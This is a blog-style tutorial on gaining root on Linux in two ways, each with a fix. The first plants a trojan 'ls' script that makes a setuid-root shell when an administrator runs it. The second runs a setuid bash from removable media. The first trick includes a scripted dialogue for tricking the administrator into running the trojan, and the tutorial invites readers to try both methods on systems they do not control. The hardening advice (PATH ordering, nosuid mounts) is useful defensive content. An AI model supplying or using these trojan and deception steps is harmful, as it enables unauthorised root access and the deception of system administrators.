In this article I will show you how to become a root user on a system that is maintained that well. If your system administrator isn't lazy this should be fixed already on your servers. But hey, you can try. I will also let you know how to fix this on a Linux system.

Trick 1:

For example, make the next bash script and place it into your home directory. For example: '/home/username/ls'

#!/bin/bash
cp /bin/bash mybash
chown root:root mybash
chmod u+s mybash
rm ls
/bin/ls "${@}"

Once you placed this file into your folder, make it executable by doing:

chmod a+x /home/username/ls

So at this time you have a script called 'ls'. As you know 'ls' is also a Linux command to list directory contents. Now you have to call your system administrator and play a little game as follows:

ROOT > Hi, how can I help you?
YOU > Please help me I have a file I can't remove
ROOT > OK, tell me
YOU > Please do the following: cd /home/username/
YOU > Did you do the change directory?
ROOT > Yes.
YOU > OK, please do a ls now
ROOT > Done, What file are you talking about?

From this stage just do as you wish, because at the moment you system administrator did the 'ls', your script was executed. The script makes a copy of a shell and sets the setuid bit. Because of this bit you are able to start the shell and become root. Test it for yourself and start the shell as follows:

/home/username/mybash -p

As you notice you will be root now. You can type the command 'id -u' which shows you the effective UID (0). This means you have root privileges now. As I told this won't work an all systems. It is quite easy to prevent users doing such things on your system. If you have root access to your system and you want to prevent users to be able to do this trick to you, you have to make sure that the current path is not in your PATH environment variable (at the begin). To check this:

root@server ~ # echo $PATH
/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:

The output shown above is correct. The current path is in the root it's PATH variable, but it is at the end (the last ':', indicates that there is an empty field after ':', but an empty field is the current path). If the current path is at the end, tricks like having executables with the same name as system executables are not executed, because it is found earlier into your path variable. So all you want to make sure is that the current path is not in the beginning. Current path into the path variable can be set with a empty field or with a dot.

Trick 2:

So your system administrator is not lazy :-). Maybe this trick can help you out. And ofcourse this trick has a solution also, but you can give it a try. What you have to do is log into a Linux machine of your own. Ofcourse you have root access on your own machine. What you can do is pretty much the same as the first trick. You have to copy a setuid bash of root onto an USB or CD/DVD. For example:

root@server ~ # cp /bin/bash /mnt/usb/mybash
root@server ~ # chown root:root /mnt/usb/mybash
root@server ~ # chmod u+s /mnt/usb/mybash

Now when you plug this USB, CD or DVD into a machine you want to get root privileges, you start your own copy of bash (mybash) from the mounted USB, CD or DVD and you have root access also. Pretty nice isn't it? But for every problem there is a solution. Ofcourse system administrators are able to set mounting of USB, CD or DVD off for normal users. But if it is enabled, they should only enable it with the next option to mount: 'mount -o nosuid'.